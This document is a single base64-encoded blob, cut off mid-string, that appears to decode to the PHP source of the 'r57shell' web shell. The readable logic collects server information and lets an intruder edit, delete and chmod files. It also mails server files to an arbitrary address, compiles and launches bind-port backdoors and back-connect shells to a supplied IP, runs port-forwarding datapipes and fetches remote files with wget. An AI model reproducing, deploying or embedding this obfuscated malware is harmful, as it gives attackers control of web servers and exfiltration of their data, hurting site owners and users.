VWdlM0J5YVc1MElGTlVSRVZTVWlBaUpDRmNiaUk3ZlEwS2ZYMTlEUW89IjtlY2hvICRoZWFkO2VjaG8gJzwvaGVhZD4nO2lmKGVtcHR5KCRfUE9TVFsnY21kJ10pKXskc2Vydj1hcnJheSgxMjcgLDE5MiAsMTcyICwxMCApOyRhZGRyPUBleHBsb2RlKCcuJywkX1NFUlZFUlsnU0VSVkVSX0FERFInXSk7JGN1cnJlbnRfdmVyc2lvbj1zdHJfcmVwbGFjZSgnLicsJycsJHZlcnNpb24pO2lmKCFpbl9hcnJheSgkYWRkclswIF0sJHNlcnYpKXt9fWVjaG8gJzxib2R5IGJnY29sb3I9IiNlNGUwZDgiPjx0YWJsZSB3aWR0aD0xMDAlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCBiZ2NvbG9yPSMwMDAwMDA+DQo8dHI+PHRkIGJnY29sb3I9I2NjY2NjYyB3aWR0aD0yMDA+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9Mj4nLndzKDEgKS4nJm5ic3A7DQo8Zm9udCBmYWNlPVdlYmRpbmdzIHNpemU9Nj48Yj4hPC9iPjwvZm9udD48Yj4nLndzKDIgKS4ncjU3c2hlbGwgJy4kdmVyc2lvbi4nPC9iPg0KPC9mb250PjwvdGQ+PHRkIGJnY29sb3I9I2NjY2NjYz48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj4nO2VjaG8gd3MoMiApO2VjaG8gIjxiPiIuZGF0ZSgiZC1tLVkgSDppOnMiKS4iPC9iPiI7ZWNobyB3cygyICkuJGxiLiIgPGEgaHJlZj0iLiRfU0VSVkVSWydQSFBfU0VMRiddLiI/cGhwaW5mbyB0aXRsZT1cIiIuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDQ2J10uIlwiPjxiPnBocGluZm88L2I+PC9hPiAiLiRyYjtlY2hvIHdzKDIgKS4kbGIuIiA8YSBocmVmPSIuJF9TRVJWRVJbJ1BIUF9TRUxGJ10uIj9waHBpbmkgdGl0bGU9XCIiLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ0NyddLiJcIj48Yj5waHAuaW5pPC9iPjwvYT4gIi4kcmI7ZWNobyB3cygyICkuJGxiLiIgPGEgaHJlZj0iLiRfU0VSVkVSWydQSFBfU0VMRiddLiI/Y3B1IHRpdGxlPVwiIi4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NTAnXS4iXCI+PGI+Y3B1PC9iPjwvYT4gIi4kcmI7ZWNobyB3cygyICkuJGxiLiIgPGEgaHJlZj0iLiRfU0VSVkVSWydQSFBfU0VMRiddLiI/bWVtIHRpdGxlPVwiIi4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NTEnXS4iXCI+PGI+bWVtPC9iPjwvYT4gIi4kcmI7aWYoJHVuaXgpe2VjaG8gd3MoMiApLiRsYi4iIDxhIGhyZWY9Ii4kX1NFUlZFUlsnUEhQX1NFTEYnXS4iP3VzZXJzIHRpdGxlPVwiIi4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0OTUnXS4iXCI+PGI+dXNlcnM8L2I+PC9hPiAiLiRyYjt9ZWNobyB3cygyICkuJGxiLiIgPGEgaHJlZj0iLiRfU0VSVkVSWydQSFBfU0VMRiddLiI/dG1wIHRpdGxlPVwiIi4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NDgnXS4iXCI+PGI+dG1wPC9iPjwvYT4gIi4kcmI7ZWNobyB3cygyICkuJGxiLiIgPGEgaHJlZj0iLiRfU0VSVkVSWydQSFBfU0VMRiddLiI/bXlzcWxfcXVlcnk+PGI+bXlzcWwgcXVlcnk8L2I+PC9hPiAiLiRyYjtlY2hvIHdzKDIgKS4kbGIuIiA8YSBocmVmPSIuJF9TRVJWRVJbJ1BIUF9TRUxGJ10uIj9kZWxldGUgdGl0bGU9XCIiLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ0OSddLiJcIj48Yj5kZWxldGU8L2I+PC9hPiAiLiRyYi4iPGJyPiI7ZWNobyB3cygyICk7ZWNobyAoKCRzYWZlX21vZGUpPygic2FmZV9tb2RlOiA8Yj48Zm9udCBjb2xvcj1ncmVlbj5PTjwvZm9udD48L2I+Iik6KCJzYWZlX21vZGU6IDxiPjxmb250IGNvbG9yPXJlZD5PRkY8L2ZvbnQ+PC9iPiIpKTtlY2hvIHdzKDIgKTtlY2hvICJQSFAgdmVyc2lvbjogPGI+Ii5AcGhwdmVyc2lvbigpLiI8L2I+IjskY3VybF9vbj1AZnVuY3Rpb25fZXhpc3RzKCdjdXJsX3ZlcnNpb24nKTtlY2hvIHdzKDIgKTtlY2hvICJjVVJMOiAiLigoJGN1cmxfb24pPygiPGI+PGZvbnQgY29sb3I9Z3JlZW4+T048L2ZvbnQ+PC9iPiIpOigiPGI+PGZvbnQgY29sb3I9cmVkPk9GRjwvZm9udD48L2I+IikpO2VjaG8gd3MoMiApO2VjaG8gIk15U1FMOiA8Yj4iOyRteXNxbF9vbj1AZnVuY3Rpb25fZXhpc3RzKCdteXNxbF9jb25uZWN0Jyk7aWYoJG15c3FsX29uKXtlY2hvICI8Zm9udCBjb2xvcj1ncmVlbj5PTjwvZm9udD48L2I+Ijt9ZWxzZSB7ZWNobyAiPGZvbnQgY29sb3I9cmVkPk9GRjwvZm9udD48L2I+Ijt9ZWNobyB3cygyICk7ZWNobyAiTVNTUUw6IDxiPiI7JG1zc3FsX29uPUBmdW5jdGlvbl9leGlzdHMoJ21zc3FsX2Nvbm5lY3QnKTtpZigkbXNzcWxfb24pe2VjaG8gIjxmb250IGNvbG9yPWdyZWVuPk9OPC9mb250PjwvYj4iO31lbHNlIHtlY2hvICI8Zm9udCBjb2xvcj1yZWQ+T0ZGPC9mb250PjwvYj4iO31lY2hvIHdzKDIgKTtlY2hvICJQb3N0Z3JlU1FMOiA8Yj4iOyRwZ19vbj1AZnVuY3Rpb25fZXhpc3RzKCdwZ19jb25uZWN0Jyk7aWYoJHBnX29uKXtlY2hvICI8Zm9udCBjb2xvcj1ncmVlbj5PTjwvZm9udD48L2I+Ijt9ZWxzZSB7ZWNobyAiPGZvbnQgY29sb3I9cmVkPk9GRjwvZm9udD48L2I+Ijt9ZWNobyB3cygyICk7ZWNobyAiT3JhY2xlOiA8Yj4iOyRvcmFfb249QGZ1bmN0aW9uX2V4aXN0cygnb2NpbG9nb24nKTtpZigkb3JhX29uKXtlY2hvICI8Zm9udCBjb2xvcj1ncmVlbj5PTjwvZm9udD48L2I+Ijt9ZWxzZSB7ZWNobyAiPGZvbnQgY29sb3I9cmVkPk9GRjwvZm9udD48L2I+Ijt9ZWNobyAiPGJyPiIud3MoMiApO2VjaG8gIkRpc2FibGUgZnVuY3Rpb25zIDogPGI+IjtpZignJz09KCRkZj1AaW5pX2dldCgnZGlzYWJsZV9mdW5jdGlvbnMnKSkpe2VjaG8gIjxmb250IGNvbG9yPWdyZWVuPk5PTkU8L2ZvbnQ+PC9iPiI7fWVsc2Uge2VjaG8gIjxmb250IGNvbG9yPXJlZD4kZGY8L2ZvbnQ+PC9iPiI7fSRmcmVlPUBkaXNrZnJlZXNwYWNlKCRkaXIpO2lmKCEkZnJlZSl7JGZyZWU9MCA7fSRhbGw9QGRpc2tfdG90YWxfc3BhY2UoJGRpcik7aWYoISRhbGwpeyRhbGw9MCA7fSR1c2VkPSRhbGwtJGZyZWU7JHVzZWRfcGVyY2VudD1Acm91bmQoMTAwIC8oJGFsbC8kZnJlZSksMiApO2VjaG8gIjxicj4iLndzKDIgKS4iSEREIEZyZWUgOiA8Yj4iLnZpZXdfc2l6ZSgkZnJlZSkuIjwvYj4gSEREIFRvdGFsIDogPGI+Ii52aWV3X3NpemUoJGFsbCkuIjwvYj4iO2VjaG8gJzwvZm9udD48L3RkPjwvdHI+PHRhYmxlPg0KPHRhYmxlIHdpZHRoPTEwMCUgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wIGJnY29sb3I9IzAwMDAwMD4NCjx0cj48dGQgYWxpZ249cmlnaHQgd2lkdGg9MTAwPic7ZWNobyAkZm9udDtpZighJHdpbmRvd3Mpe2VjaG8gJzxmb250IGNvbG9yPWJsdWU+PGI+dW5hbWUgLWEgOicud3MoMSApLic8YnI+c3lzY3RsIDonLndzKDEgKS4nPGJyPiRPU1RZUEUgOicud3MoMSApLic8YnI+U2VydmVyIDonLndzKDEgKS4nPGJyPmlkIDonLndzKDEgKS4nPGJyPnB3ZCA6Jy53cygxICkuJzwvYj48L2ZvbnQ+PGJyPic7ZWNobyAiPC90ZD48dGQ+IjtlY2hvICI8Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMiBjb2xvcj1yZWQ+PGI+IjskdW5hbWU9ZXgoJ3VuYW1lIC1hJyk7ZWNobyAoKCFlbXB0eSgkdW5hbWUpKT8od3MoMyApLkBzdWJzdHIoJHVuYW1lLDAgLDEyMCApLiI8YnI+Iik6KHdzKDMgKS5Ac3Vic3RyKEBwaHBfdW5hbWUoKSwwICwxMjAgKS4iPGJyPiIpKTtpZighJHNhZmVfbW9kZSl7JGJzZDE9ZXgoJ3N5c2N0bCAtbiBrZXJuLm9zdHlwZScpOyRic2QyPWV4KCdzeXNjdGwgLW4ga2Vybi5vc3JlbGVhc2UnKTskbGluMT1leCgnc3lzY3RsIC1uIGtlcm5lbC5vc3R5cGUnKTskbGluMj1leCgnc3lzY3RsIC1uIGtlcm5lbC5vc3JlbGVhc2UnKTt9aWYoIWVtcHR5KCRic2QxKSAmJiAhZW1wdHkoJGJzZDIpKXskc3lzY3RsPSIkYnNkMSAkYnNkMiI7fWVsc2UgaWYoIWVtcHR5KCRsaW4xKSAmJiAhZW1wdHkoJGxpbjIpKXskc3lzY3RsPSIkbGluMSAkbGluMiI7fWVsc2UgeyRzeXNjdGw9Ii0iO31lY2hvIHdzKDMgKS4kc3lzY3RsLiI8YnI+IjtlY2hvIHdzKDMgKS5leCgnZWNobyAkT1NUWVBFJykuIjxicj4iO2VjaG8gd3MoMyApLkBzdWJzdHIoJFNFUlZFUl9TT0ZUV0FSRSwwICwxMjAgKS4iPGJyPiI7JGlkPWV4KCdpZCcpO2VjaG8gKCghZW1wdHkoJGlkKSk/KHdzKDMgKS4kaWQuIjxicj4iKTood3MoMyApLiJ1c2VyPSIuQGdldF9jdXJyZW50X3VzZXIoKS4iIHVpZD0iLkBnZXRteXVpZCgpLiIgZ2lkPSIuQGdldG15Z2lkKCkuIjxicj4iKSk7ZWNobyB3cygzICkuJGRpcjtlY2hvIHdzKDMgKS4nKCAnLnBlcm1zKEBmaWxlcGVybXMoJGRpcikpLicgKSc7ZWNobyAiPC9iPjwvZm9udD4iO31lbHNlIHtlY2hvICc8Zm9udCBjb2xvcj1ibHVlPjxiPk9TIDonLndzKDEgKS4nPGJyPlNlcnZlciA6Jy53cygxICkuJzxicj5Vc2VyIDonLndzKDEgKS4nPGJyPnB3ZCA6Jy53cygxICkuJzwvYj48L2ZvbnQ+PGJyPic7ZWNobyAiPC90ZD48dGQ+IjtlY2hvICI8Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMiBjb2xvcj1yZWQ+PGI+IjtlY2hvIHdzKDMgKS5Ac3Vic3RyKEBwaHBfdW5hbWUoKSwwICwxMjAgKS4iPGJyPiI7ZWNobyB3cygzICkuQHN1YnN0cigkU0VSVkVSX1NPRlRXQVJFLDAgLDEyMCApLiI8YnI+IjtlY2hvIHdzKDMgKS5AZ2V0X2N1cnJlbnRfdXNlcigpLiI8YnI+IjtlY2hvIHdzKDMgKS4kZGlyO2VjaG8gIjxicj48L2ZvbnQ+Ijt9ZWNobyAiPC9mb250PiI7ZWNobyAiPC90ZD48L3RyPjwvdGFibGU+IjtpZihpc3NldCgkX1BPU1RbJ2NtZCddKSAmJiAhZW1wdHkoJF9QT1NUWydjbWQnXSkgJiYgJF9QT1NUWydjbWQnXT09Im1haWwiKXskcmVzPW1haWwoJF9QT1NUWyd0byddLCRfUE9TVFsnc3ViaiddLCRfUE9TVFsndGV4dCddLCJGcm9tOiAiLiRQT1NUWydmcm9tJ10uIlxyXG4iKTttcigkbGFuZ3VhZ2UsJHJlcyk7JF9QT1NUWydjbWQnXT0iIjt9aWYoaXNzZXQoJF9QT1NUWydjbWQnXSkgJiYgIWVtcHR5KCRfUE9TVFsnY21kJ10pICYmICRfUE9TVFsnY21kJ109PSJtYWlsX2ZpbGUiICYmICFlbXB0eSgkX1BPU1RbJ2xvY19maWxlJ10pKXtpZighJGZpbGU9QGZvcGVuKCRfUE9TVFsnbG9jX2ZpbGUnXSwiciIpKXtlY2hvIHJlKCRfUE9TVFsnbG9jX2ZpbGUnXSk7JF9QT1NUWydjbWQnXT0iIjt9ZWxzZSB7JGZpbGVuYW1lPUBiYXNlbmFtZSgkX1BPU1RbJ2xvY19maWxlJ10pOyRmaWxlZHVtcD1AZnJlYWQoJGZpbGUsQGZpbGVzaXplKCRfUE9TVFsnbG9jX2ZpbGUnXSkpO2ZjbG9zZSgkZmlsZSk7JGNvbnRlbnRfZW5jb2Rpbmc9JG1pbWVfdHlwZT0nJztjb21wcmVzcygkZmlsZW5hbWUsJGZpbGVkdW1wLCRfUE9TVFsnY29tcHJlc3MnXSk7JGF0dGFjaD1hcnJheSgibmFtZSI9PiRmaWxlbmFtZSwidHlwZSI9PiRtaW1lX3R5cGUsImNvbnRlbnQiPT4kZmlsZWR1bXApO2lmKGVtcHR5KCRfUE9TVFsnc3ViaiddKSl7JF9QT1NUWydzdWJqJ109J2ZpbGUgZnJvbSByNTdzaGVsbCc7fWlmKGVtcHR5KCRfUE9TVFsnZnJvbSddKSl7JF9QT1NUWydmcm9tJ109J2JpbGx5QG1pY3Jvc29mdC5jb20nO30kcmVzPW1haWxhdHRhY2goJF9QT1NUWyd0byddLCRfUE9TVFsnZnJvbSddLCRfUE9TVFsnc3ViaiddLCRhdHRhY2gpO21yKCRsYW5ndWFnZSwkcmVzKTskX1BPU1RbJ2NtZCddPSIiO319aWYoIWVtcHR5KCRfUE9TVFsnY21kJ10pICYmICRfUE9TVFsnY21kJ109PSJmaW5kX3RleHQiKXskX1BPU1RbJ2NtZCddPSdmaW5kICcuJF9QT1NUWydzX2RpciddLicgLW5hbWUgXCcnLiRfUE9TVFsnc19tYXNrJ10uJ1wnIHwgeGFyZ3MgZ3JlcCAtRSBcJycuJF9QT1NUWydzX3RleHQnXS4nXCcnO31pZighZW1wdHkoJF9QT1NUWydjbWQnXSkgJiYgJF9QT1NUWydjbWQnXT09ImNoXyIpe3N3aXRjaCgkX1BPU1RbJ3doYXQnXSl7Y2FzZSAnb3duJzpAY2hvd24oJF9QT1NUWydwYXJhbTEnXSwkX1BPU1RbJ3BhcmFtMiddKTticmVhaztjYXNlICdncnAnOkBjaGdycCgkX1BPU1RbJ3BhcmFtMSddLCRfUE9TVFsncGFyYW0yJ10pO2JyZWFrO2Nhc2UgJ21vZCc6QGNobW9kKCRfUE9TVFsncGFyYW0xJ10saW50dmFsKCRfUE9TVFsncGFyYW0yJ10sOCApKTticmVhazt9JF9QT1NUWydjbWQnXT0iIjt9aWYoIWVtcHR5KCRfUE9TVFsnY21kJ10pICYmICRfUE9TVFsnY21kJ109PSJtayIpe3N3aXRjaCgkX1BPU1RbJ3doYXQnXSl7Y2FzZSAnZmlsZSc6aWYoJF9QT1NUWydhY3Rpb24nXT09ImNyZWF0ZSIpe2lmKGZpbGVfZXhpc3RzKCRfUE9TVFsnbWtfbmFtZSddKSB8fCAhJGZpbGU9QGZvcGVuKCRfUE9TVFsnbWtfbmFtZSddLCJ3Iikpe2VjaG8gY2UoJF9QT1NUWydta19uYW1lJ10pOyRfUE9TVFsnY21kJ109IiI7fWVsc2Uge2ZjbG9zZSgkZmlsZSk7JF9QT1NUWydlX25hbWUnXT0kX1BPU1RbJ21rX25hbWUnXTskX1BPU1RbJ2NtZCddPSJlZGl0X2ZpbGUiO2VjaG8gIjx0YWJsZSB3aWR0aD0xMDAlIGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCBiZ2NvbG9yPSMwMDAwMDA+PHRyPjx0ZCBiZ2NvbG9yPSNjY2NjY2M+PGRpdiBhbGlnbj1jZW50ZXI+PGZvbnQgZmFjZT1WZXJkYW5hIHNpemU9LTI+PGI+Ii4kbGFuZ1skbGFuZ3VhZ2UuJ190ZXh0NjEnXS4iPC9iPjwvZm9udD48L2Rpdj48L3RkPjwvdHI+PC90YWJsZT4iO319ZWxzZSBpZigkX1BPU1RbJ2FjdGlvbiddPT0iZGVsZXRlIil7aWYodW5saW5rKCRfUE9TVFsnbWtfbmFtZSddKSllY2hvICI8dGFibGUgd2lkdGg9MTAwJSBjZWxscGFkZGluZz0wIGNlbGxzcGFjaW5nPTAgYmdjb2xvcj0jMDAwMDAwPjx0cj48dGQgYmdjb2xvcj0jY2NjY2NjPjxkaXYgYWxpZ249Y2VudGVyPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPjxiPiIuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDYzJ10uIjwvYj48L2ZvbnQ+PC9kaXY+PC90ZD48L3RyPjwvdGFibGU+IjskX1BPU1RbJ2NtZCddPSIiO31icmVhaztjYXNlICdkaXInOmlmKCRfUE9TVFsnYWN0aW9uJ109PSJjcmVhdGUiKXtpZihta2RpcigkX1BPU1RbJ21rX25hbWUnXSkpeyRfUE9TVFsnY21kJ109IiI7ZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wIGJnY29sb3I9IzAwMDAwMD48dHI+PHRkIGJnY29sb3I9I2NjY2NjYz48ZGl2IGFsaWduPWNlbnRlcj48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj48Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ2MiddLiI8L2I+PC9mb250PjwvZGl2PjwvdGQ+PC90cj48L3RhYmxlPiI7fWVsc2Uge2VjaG8gY2UoJF9QT1NUWydta19uYW1lJ10pOyRfUE9TVFsnY21kJ109IiI7fX1lbHNlIGlmKCRfUE9TVFsnYWN0aW9uJ109PSJkZWxldGUiKXtpZihybWRpcigkX1BPU1RbJ21rX25hbWUnXSkpZWNobyAiPHRhYmxlIHdpZHRoPTEwMCUgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wIGJnY29sb3I9IzAwMDAwMD48dHI+PHRkIGJnY29sb3I9I2NjY2NjYz48ZGl2IGFsaWduPWNlbnRlcj48Zm9udCBmYWNlPVZlcmRhbmEgc2l6ZT0tMj48Yj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ2NCddLiI8L2I+PC9mb250PjwvZGl2PjwvdGQ+PC90cj48L3RhYmxlPiI7JF9QT1NUWydjbWQnXT0iIjt9YnJlYWs7fX1pZighZW1wdHkoJF9QT1NUWydjbWQnXSkgJiYgJF9QT1NUWydjbWQnXT09ImVkaXRfZmlsZSIgJiYgIWVtcHR5KCRfUE9TVFsnZV9uYW1lJ10pKXtpZighJGZpbGU9QGZvcGVuKCRfUE9TVFsnZV9uYW1lJ10sInIrIikpeyRvbmx5X3JlYWQ9MSA7QGZjbG9zZSgkZmlsZSk7fWlmKCEkZmlsZT1AZm9wZW4oJF9QT1NUWydlX25hbWUnXSwiciIpKXtlY2hvIHJlKCRfUE9TVFsnZV9uYW1lJ10pOyRfUE9TVFsnY21kJ109IiI7fWVsc2Uge2VjaG8gJHRhYmxlX3VwMztlY2hvICRmb250O2VjaG8gIjxmb3JtIG5hbWU9c2F2ZV9maWxlIG1ldGhvZD1wb3N0PiI7ZWNobyB3cygzICkuIjxiPiIuJF9QT1NUWydlX25hbWUnXS4iPC9iPiI7ZWNobyAiPGRpdiBhbGlnbj1jZW50ZXI+PHRleHRhcmVhIG5hbWU9ZV90ZXh0IGNvbHM9MTIxIHJvd3M9MjQ+IjtlY2hvIEBodG1sc3BlY2lhbGNoYXJzKEBmcmVhZCgkZmlsZSxAZmlsZXNpemUoJF9QT1NUWydlX25hbWUnXSkpKTtmY2xvc2UoJGZpbGUpO2VjaG8gIjwvdGV4dGFyZWE+IjtlY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1lX25hbWUgdmFsdWU9Ii4kX1BPU1RbJ2VfbmFtZSddLiI+IjtlY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1kaXIgdmFsdWU9Ii4kZGlyLiI+IjtlY2hvICI8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1jbWQgdmFsdWU9c2F2ZV9maWxlPiI7ZWNobyAoIWVtcHR5KCRvbmx5X3JlYWQpPygiPGJyPjxicj4iLiRsYW5nWyRsYW5ndWFnZS4nX3RleHQ0NCddKTooIjxicj48YnI+PGlucHV0IHR5cGU9c3VibWl0IG5hbWU9c3VibWl0IHZhbHVlPVwiICIuJGxhbmdbJGxhbmd1YWdlLidfYnV0dDEwJ10uIiBcIj4iKSk7ZWNobyAiPC9kaXY+IjtlY2hvICI8L2ZvbnQ+IjtlY2hvICI8L2Zvcm0+IjtlY2hvICI8L3RkPjwvdHI+PC90YWJsZT4iO2V4aXQoKTt9fWlmKCFlbXB0eSgkX1BPU1RbJ2NtZCddKSAmJiAkX1BPU1RbJ2NtZCddPT0ic2F2ZV9maWxlIil7aWYoISRmaWxlPUBmb3BlbigkX1BPU1RbJ2VfbmFtZSddLCJ3Iikpe2VjaG8gd2UoJF9QT1NUWydlX25hbWUnXSk7fWVsc2Uge0Bmd3JpdGUoJGZpbGUsJF9QT1NUWydlX3RleHQnXSk7QGZjbG9zZSgkZmlsZSk7JF9QT1NUWydjbWQnXT0iIjtlY2hvICI8dGFibGUgd2lkdGg9MTAwJSBjZWxscGFkZGluZz0wIGNlbGxzcGFjaW5nPTAgYmdjb2xvcj0jMDAwMDAwPjx0cj48dGQgYmdjb2xvcj0jY2NjY2NjPjxkaXYgYWxpZ249Y2VudGVyPjxmb250IGZhY2U9VmVyZGFuYSBzaXplPS0yPjxiPiIuJGxhbmdbJGxhbmd1YWdlLidfdGV4dDQ1J10uIjwvYj48L2ZvbnQ+PC9kaXY+PC90ZD48L3RyPjwvdGFibGU+Ijt9fWlmKCFlbXB0eSgkX1BPU1RbJ3BvcnQnXSkgJiYgIWVtcHR5KCRfUE9TVFsnYmluZF9wYXNzJ10pICYmICgkX1BPU1RbJ3VzZSddPT0iQyIpKXtjZigiL3RtcC9iZC5jIiwkcG9ydF9iaW5kX2JkX2MpOyRibGFoPWV4KCJnY2MgLW8gL3RtcC9iZCAvdG1wL2JkLmMiKTtAdW5saW5rKCIvdG1wL2JkLmMiKTskYmxhaD1leCgiL3RtcC9iZCAiLiRfUE9TVFsncG9ydCddLiIgIi4kX1BPU1RbJ2JpbmRfcGFzcyddLiIgJiIpOyRfUE9TVFsnY21kJ109InBzIC1hdXggfCBncmVwIGJkIjt9aWYoIWVtcHR5KCRfUE9TVFsncG9ydCddKSAmJiAhZW1wdHkoJF9QT1NUWydiaW5kX3Bhc3MnXSkgJiYgKCRfUE9TVFsndXNlJ109PSJQZXJsIikpe2NmKCIvdG1wL2JkcGwiLCRwb3J0X2JpbmRfYmRfcGwpOyRwMj13aGljaCgicGVybCIpO2lmKGVtcHR5KCRwMikpJHAyPSJwZXJsIjskYmxhaD1leCgkcDIuIiAvdG1wL2JkcGwgIi4kX1BPU1RbJ3BvcnQnXS4iICYiKTskX1BPU1RbJ2NtZCddPSJwcyAtYXV4IHwgZ3JlcCBiZHBsIjt9aWYoIWVtcHR5KCRfUE9TVFsnaXAnXSkgJiYgIWVtcHR5KCRfUE9TVFsncG9ydCddKSAmJiAoJF9QT1NUWyd1c2UnXT09IlBlcmwiKSl7Y2YoIi90bXAvYmFjayIsJGJhY2tfY29ubmVjdCk7JHAyPXdoaWNoKCJwZXJsIik7aWYoZW1wdHkoJHAyKSkkcDI9InBlcmwiOyRibGFoPWV4KCRwMi4iIC90bXAvYmFjayAiLiRfUE9TVFsnaXAnXS4iICIuJF9QT1NUWydwb3J0J10uIiAmIik7JF9QT1NUWydjbWQnXT0iZWNobyBcIk5vdyBzY3JpcHQgdHJ5IGNvbm5lY3QgdG8gIi4kX1BPU1RbJ2lwJ10uIiBwb3J0ICIuJF9QT1NUWydwb3J0J10uIiAuLi5cIiI7fWlmKCFlbXB0eSgkX1BPU1RbJ2lwJ10pICYmICFlbXB0eSgkX1BPU1RbJ3BvcnQnXSkgJiYgKCRfUE9TVFsndXNlJ109PSJDIikpe2NmKCIvdG1wL2JhY2suYyIsJGJhY2tfY29ubmVjdF9jKTskYmxhaD1leCgiZ2NjIC1vIC90bXAvYmFja2MgL3RtcC9iYWNrLmMiKTtAdW5saW5rKCIvdG1wL2JhY2suYyIpOyRibGFoPWV4KCIvdG1wL2JhY2tjICIuJF9QT1NUWydpcCddLiIgIi4kX1BPU1RbJ3BvcnQnXS4iICYiKTskX1BPU1RbJ2NtZCddPSJlY2hvIFwiTm93IHNjcmlwdCB0cnkgY29ubmVjdCB0byAiLiRfUE9TVFsnaXAnXS4iIHBvcnQgIi4kX1BPU1RbJ3BvcnQnXS4iIC4uLlwiIjt9aWYoIWVtcHR5KCRfUE9TVFsnbG9jYWxfcG9ydCddKSAmJiAhZW1wdHkoJF9QT1NUWydyZW1vdGVfaG9zdCddKSAmJiAhZW1wdHkoJF9QT1NUWydyZW1vdGVfcG9ydCddKSAmJiAoJF9QT1NUWyd1c2UnXT09IlBlcmwiKSl7Y2YoIi90bXAvZHAiLCRkYXRhcGlwZV9wbCk7JHAyPXdoaWNoKCJwZXJsIik7aWYoZW1wdHkoJHAyKSkkcDI9InBlcmwiOyRibGFoPWV4KCRwMi4iIC90bXAvZHAgIi4kX1BPU1RbJ2xvY2FsX3BvcnQnXS4iICIuJF9QT1NUWydyZW1vdGVfaG9zdCddLiIgIi4kX1BPU1RbJ3JlbW90ZV9wb3J0J10uIiAmIik7JF9QT1NUWydjbWQnXT0icHMgLWF1eCB8IGdyZXAgZHAiO31pZighZW1wdHkoJF9QT1NUWydsb2NhbF9wb3J0J10pICYmICFlbXB0eSgkX1BPU1RbJ3JlbW90ZV9ob3N0J10pICYmICFlbXB0eSgkX1BPU1RbJ3JlbW90ZV9wb3J0J10pICYmICgkX1BPU1RbJ3VzZSddPT0iQyIpKXtjZigiL3RtcC9kcGMuYyIsJGRhdGFwaXBlX2MpOyRibGFoPWV4KCJnY2MgLW8gL3RtcC9kcGMgL3RtcC9kcGMuYyIpO0B1bmxpbmsoIi90bXAvZHBjLmMiKTskYmxhaD1leCgiL3RtcC9kcGMgIi4kX1BPU1RbJ2xvY2FsX3BvcnQnXS4iICIuJF9QT1NUWydyZW1vdGVfcG9ydCddLiIgIi4kX1BPU1RbJ3JlbW90ZV9ob3N0J10uIiAmIik7JF9QT1NUWydjbWQnXT0icHMgLWF1eCB8IGdyZXAgZHBjIjt9aWYoIWVtcHR5KCRfUE9TVFsnYWxpYXMnXSkpe2ZvcmVhY2goJGFsaWFzZXMgYXMgJGFsaWFzX25hbWU9PiRhbGlhc19jbWQpe2lmKCRfUE9TVFsnYWxpYXMnXT09JGFsaWFzX25hbWUpeyRfUE9TVFsnY21kJ109JGFsaWFzX2NtZDt9fX1pZighZW1wdHkoJF9GSUxFU1sndXNlcmZpbGUnXVsnbmFtZSddKSl7aWYoaXNzZXQoJF9QT1NUWyduZjEnXSkgJiYgIWVtcHR5KCRfUE9TVFsnbmV3X25hbWUnXSkpeyRuZm49JF9QT1NUWyduZXdfbmFtZSddO31lbHNlIHskbmZuPSRfRklMRVNbJ3VzZXJmaWxlJ11bJ25hbWUnXTt9aWYoIUBjb3B5KCRfRklMRVNbJ3VzZXJmaWxlJ11bJ3RtcF9uYW1lJ10sJF9QT1NUWydkaXInXS4iLyIuJG5mbikpe3ByaW50ICgiPGZvbnQgY29sb3I9cmVkIGZhY2U9Rml4ZWRzeXM+PGRpdiBhbGlnbj1jZW50ZXI+RXJyb3IgdXBsb2FkaW5nIGZpbGUgIi4kX0ZJTEVTWyd1c2VyZmlsZSddWyduYW1lJ10uIjwvZGl2PjwvZm9udD4iKTt9ZWxzZSB7aWYoaXNfZmlsZSgnaW5kZXgucGhwJykpeyR0aW1lT3RoRmlsZT1maWxlbXRpbWUoJ2luZGV4LnBocCcpO3RvdWNoKCRfUE9TVFsnZGlyJ10uIi8iLiRuZm4sJHRpbWVPdGhGaWxlLCR0aW1lT3RoRmlsZSk7fX19aWYoIWVtcHR5KCRfUE9TVFsnd2l0aCddKSAmJiAhZW1wdHkoJF9QT1NUWydyZW1fZmlsZSddKSAmJiAhZW1wdHkoJF9QT1NUWydsb2NfZmlsZSddKSl7c3dpdGNoKCRfUE9TVFsnd2l0aCddKXtjYXNlIHdnZXQ6JF9QT1NUWydjbWQnXT13aGljaCgnd2dldCcpLiIgIi4kX1BPU1RbJ3JlbV9maWxlJ10uIiAtTyAiLiRfUE9TVFsnbG9jX2ZpbGUnXS4iIjticmVhaztjYXNlIGZldGNoOiRfUE9TVFsnY21kJ109d2hpY2goJ2ZldGNoJykuIiAtbyAiLiRfUE9TVFsnbG9jX2ZpbGUnXS4iIC1wICIuJF9QT1NUWydyZW1fZmlsZSddLiIiO2JyZWFrO2Nhc2UgbHlueDokX1BPU1RbJ2NtZCddPXdoaWNoKCdseW54JykuIiAtc291cmNlICIuJF9QT1NUWydyZW1fZmlsZSddLiIgPiAiLiRfUE9TVFsnbG9jX2ZpbGUnXS4iIjticmVhaztjYXNlIGxpbmtzOiRfUE9TVFsnY21kJ109d2hpY2goJ2xpbmtzJykuIiAtc291cmNlICIuJF9QT1NUWydyZW1fZmlsZSddLiIg